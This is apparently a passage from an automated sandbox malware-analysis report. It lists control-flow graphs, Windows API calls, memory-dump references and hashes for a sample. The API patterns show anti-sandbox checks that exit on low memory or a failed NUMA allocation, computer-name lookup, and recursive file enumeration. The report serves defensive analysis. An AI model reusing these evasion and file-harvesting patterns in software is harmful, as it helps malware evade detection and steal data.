                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ??2@$CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1683549937-4251816714
                          • Opcode ID: 3a9a884b9a02c3411ce0afc09bbdc92bb873d57a7b8b268fc9d1401a6a098c36
                          • Instruction ID: c2fabbd4f6ca49ae1174766388cd79f437a803c376b26fd0c14af86305cfea0e
                          • Opcode Fuzzy Hash: 3a9a884b9a02c3411ce0afc09bbdc92bb873d57a7b8b268fc9d1401a6a098c36
                          • Instruction Fuzzy Hash: DB012971D01218ABDB14DFA8EC45B9EBBB8EB59320F00816AF954E7390EB7499048FD4

                          Control-flow Graph

                          control_flow_graph 2798 3a1030-3a1055 GetCurrentProcess VirtualAllocExNuma 2799 3a105e-3a107b VirtualAlloc 2798->2799 2800 3a1057-3a1058 ExitProcess 2798->2800 2801 3a107d-3a1080 2799->2801 2802 3a1082-3a1088 2799->2802 2801->2802 2803 3a108a-3a10ab VirtualFree 2802->2803 2804 3a10b1-3a10b6 2802->2804 2803->2804
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003A1046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 003A104D
                          • ExitProcess.KERNEL32 ref: 003A1058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003A106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003A10AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: aeaa18f97cd3d15d697be6d8fdc1bc2c437d214228752df620ccc1f3e4260974
                          • Instruction ID: 75e7532d4528c34f23b10dbf51f702d85b04a851f96fe2f82d3b15effcecd59b
                          • Opcode Fuzzy Hash: aeaa18f97cd3d15d697be6d8fdc1bc2c437d214228752df620ccc1f3e4260974
                          • Instruction Fuzzy Hash: 3C014471342204BBE7205B646C0EF6B77ACE7A1B01F208016F708E32C0D9B1E9049624

                          Control-flow Graph

                          control_flow_graph 2805 3bee90-3beeb5 call 3a2930 2808 3beec9-3beecd call 3a6c40 2805->2808 2809 3beeb7-3beebf 2805->2809 2812 3beed2-3beee8 StrCmpCA 2808->2812 2809->2808 2810 3beec1-3beec3 lstrcpy 2809->2810 2810->2808 2813 3beeea-3bef02 call 3a2a20 call 3a2930 2812->2813 2814 3bef11-3bef18 call 3a2a20 2812->2814 2823 3bef45-3befa0 call 3a2a20 * 10 2813->2823 2824 3bef04-3bef0c 2813->2824 2820 3bef20-3bef28 2814->2820 2820->2820 2822 3bef2a-3bef37 call 3a2930 2820->2822 2822->2823 2831 3bef39 2822->2831 2824->2823 2827 3bef0e-3bef0f 2824->2827 2830 3bef3e-3bef3f lstrcpy 2827->2830 2830->2823 2831->2830
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BEEC3
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 003BEEDE
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 003BEF3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: ERROR
                          • API String ID: 3722407311-2861137601
                          • Opcode ID: 159f9f67682226d302f209631994da2c62ed0f157548ffaa18c72e97a2466565
                          • Instruction ID: 1ffbd69d07988d43e3626355eb7083460e4fe7a7614bd7c6ecb0142aff4e7674
                          • Opcode Fuzzy Hash: 159f9f67682226d302f209631994da2c62ed0f157548ffaa18c72e97a2466565
                          • Instruction Fuzzy Hash: D921FF317202059BCB27BF7CD846AEB37A4EF11304F055429B84ADFA52EE30D8248B90

                          Control-flow Graph

                          control_flow_graph 2886 3a10c0-3a10cb 2887 3a10d0-3a10dc 2886->2887 2889 3a10de-3a10f3 GlobalMemoryStatusEx 2887->2889 2890 3a1112-3a1114 ExitProcess 2889->2890 2891 3a10f5-3a1106 2889->2891 2892 3a111a-3a111d 2891->2892 2893 3a1108 2891->2893 2893->2890 2894 3a110a-3a1110 2893->2894 2894->2890 2894->2892
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: a38697c4e75742e8507920762ea27784834032e6882cebb0d5ecb039f6688a8c
                          • Instruction ID: 22e6a2692b7d000e80e30ee54ca3c50757653c42af834cac03a40c4a996a690f
                          • Opcode Fuzzy Hash: a38697c4e75742e8507920762ea27784834032e6882cebb0d5ecb039f6688a8c
                          • Instruction Fuzzy Hash: 3AF0EC701182455BEB55BA64DC4A72EF7DCEB13350F144A2EDE9BC2191E774C8409167

                          Control-flow Graph

                          control_flow_graph 2895 3b8c88-3b8cc4 StrCmpCA 2897 3b8ccd-3b8ce6 2895->2897 2898 3b8cc6-3b8cc7 ExitProcess 2895->2898 2900 3b8cec-3b8cf1 2897->2900 2901 3b8ee2-3b8eef call 3a2a20 2897->2901 2903 3b8cf6-3b8cf9 2900->2903 2905 3b8cff 2903->2905 2906 3b8ec3-3b8edc 2903->2906 2907 3b8d5a-3b8d69 lstrlen 2905->2907 2908 3b8dbd-3b8dcb StrCmpCA 2905->2908 2909 3b8ddd-3b8deb StrCmpCA 2905->2909 2910 3b8dfd-3b8e0b StrCmpCA 2905->2910 2911 3b8e1d-3b8e2b StrCmpCA 2905->2911 2912 3b8e3d-3b8e4b StrCmpCA 2905->2912 2913 3b8d30-3b8d3f lstrlen 2905->2913 2914 3b8e56-3b8e64 StrCmpCA 2905->2914 2915 3b8e88-3b8e9a lstrlen 2905->2915 2916 3b8e6f-3b8e7d StrCmpCA 2905->2916 2917 3b8d06-3b8d15 lstrlen 2905->2917 2918 3b8d84-3b8d92 StrCmpCA 2905->2918 2919 3b8da4-3b8db8 StrCmpCA 2905->2919 2906->2901 2938 3b8cf3 2906->2938 2935 3b8d6b-3b8d70 call 3a2a20 2907->2935 2936 3b8d73-3b8d7f call 3a2930 2907->2936 2908->2906 2922 3b8dd1-3b8dd8 2908->2922 2909->2906 2923 3b8df1-3b8df8 2909->2923 2910->2906 2924 3b8e11-3b8e18 2910->2924 2911->2906 2925 3b8e31-3b8e38 2911->2925 2912->2906 2926 3b8e4d-3b8e54 2912->2926 2933 3b8d49-3b8d55 call 3a2930 2913->2933 2934 3b8d41-3b8d46 call 3a2a20 2913->2934 2914->2906 2929 3b8e66-3b8e6d 2914->2929 2931 3b8e9c-3b8ea1 call 3a2a20 2915->2931 2932 3b8ea4-3b8eb0 call 3a2930 2915->2932 2916->2906 2930 3b8e7f-3b8e86 2916->2930 2927 3b8d1f-3b8d2b call 3a2930 2917->2927 2928 3b8d17-3b8d1c call 3a2a20 2917->2928 2918->2906 2921 3b8d98-3b8d9f 2918->2921 2919->2906 2921->2906 2922->2906 2923->2906 2924->2906 2925->2906 2926->2906 2954 3b8eb3-3b8eb5 2927->2954 2928->2927 2929->2906 2930->2906 2931->2932 2932->2954 2933->2954 2934->2933 2935->2936 2936->2954 2938->2903 2954->2906 2955 3b8eb7-3b8eb9 2954->2955 2955->2906 2956 3b8ebb-3b8ebd lstrcpy 2955->2956 2956->2906
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: d89f91dc8ac8c1d093697df88394052c0a7043b18675a7caf98ea5cab9d026df
                          • Instruction ID: 7f361b62052df3ca78f535d65e46726e2051fda53bb63b8a7daba2ce32a99c51
                          • Opcode Fuzzy Hash: d89f91dc8ac8c1d093697df88394052c0a7043b18675a7caf98ea5cab9d026df
                          • Instruction Fuzzy Hash: DCE09225005255FBCB219BB9DC98A82BBA9EFAA300B451896E600AF654D630FC05D7A6

                          Control-flow Graph

                          control_flow_graph 2957 3c2ad0-3c2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 3c2b44-3c2b59 2957->2958 2959 3c2b24-3c2b36 2957->2959
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003C2AFF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C2B06
                          • GetComputerNameA.KERNEL32(00000000,00000104), ref: 003C2B1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 3ab40d9b5235234d0b383adae8b8741dde4decd01eb1c562eb678bb4ee9ca945
                          • Instruction ID: 5aed19e3d62134ec01687e994c14f07567360d45f329722962b5aee6c1ce4cb6
                          • Opcode Fuzzy Hash: 3ab40d9b5235234d0b383adae8b8741dde4decd01eb1c562eb678bb4ee9ca945
                          • Instruction Fuzzy Hash: 0601D176A45648ABC720DF99EC49BAEF7B8F744B21F00026BF919E3780D774190487A1
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003A1046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 003A104D
                          • ExitProcess.KERNEL32 ref: 003A1058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003A106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003A10AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: 06ee86f402543fa21776d88ffaa73c3e3b2519b2853ef9dc13fe492cb7181786
                          • Instruction ID: 1384ef6bf3905019f7545177769b101f67761379c323ba8780f6c65cb7384d98
                          • Opcode Fuzzy Hash: 06ee86f402543fa21776d88ffaa73c3e3b2519b2853ef9dc13fe492cb7181786
                          • Instruction Fuzzy Hash: 5EE0C2B468A3443EF73113616C0FF023F2CAB22B01F018003F344E60C2D5D4A405A668
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B23D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B23F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B2402
                          • lstrlen.KERNEL32(\*.*), ref: 003B240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 003B2436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B2486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: 211596184a3695c0e4d60a1f5164bcced18aef1afd0e57ae66d61a9f9bb02519
                          • Instruction ID: ed47fc4494c4843be7fd12f786aa250e34fded00c91dc2dcdbb5f5ffd1ced2db
                          • Opcode Fuzzy Hash: 211596184a3695c0e4d60a1f5164bcced18aef1afd0e57ae66d61a9f9bb02519
                          • Instruction Fuzzy Hash: E1A29D31A11216ABCB33AFA8DC89AEF77B9EF15704F05412AF909DB611DB34DD058B90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A16E2
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A1719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A176C
                          • lstrcat.KERNEL32(00000000), ref: 003A1776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17EF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A17F9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1825
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1875
                          • lstrcat.KERNEL32(00000000), ref: 003A187F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A18AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A18F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A18FE
                          • lstrlen.KERNEL32(003D1794), ref: 003A1909
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1929
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1935
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A195B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1966
                          • lstrlen.KERNEL32(\*.*), ref: 003A1971
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A198E
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 003A199A
                            • Part of subcall function 003C4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 003C406D
                            • Part of subcall function 003C4040: lstrcpy.KERNEL32(00000000,?), ref: 003C40A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A19C3
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1A0E
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1A16
                          • lstrlen.KERNEL32(003D1794), ref: 003A1A21
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1A41
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1A4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1A76
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1A81
                          • lstrlen.KERNEL32(003D1794), ref: 003A1A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1AAC
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1AB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1ADE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1AE9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B11
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003A1B45
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003A1B70
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003A1B8A
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A1BC4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1BFB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1C03
                          • lstrlen.KERNEL32(003D1794), ref: 003A1C0E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C31
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1C3D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C69
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1C74
                          • lstrlen.KERNEL32(003D1794), ref: 003A1C7F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1CA2
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1CAE
                          • lstrlen.KERNEL32(?), ref: 003A1CBB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1CDB
                          • lstrcat.KERNEL32(00000000,?), ref: 003A1CE9
                          • lstrlen.KERNEL32(003D1794), ref: 003A1CF4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1D14
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1D20
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D46
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1D51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D7D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1DE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1DEB
                          • lstrlen.KERNEL32(003D1794), ref: 003A1DF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1E19
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1E25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1E4B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1E56
                          • lstrlen.KERNEL32(003D1794), ref: 003A1E61
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1E81
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1E8D
                          • lstrlen.KERNEL32(?), ref: 003A1E9A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1EBA
                          • lstrcat.KERNEL32(00000000,?), ref: 003A1EC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1EF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F3E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003A1F45
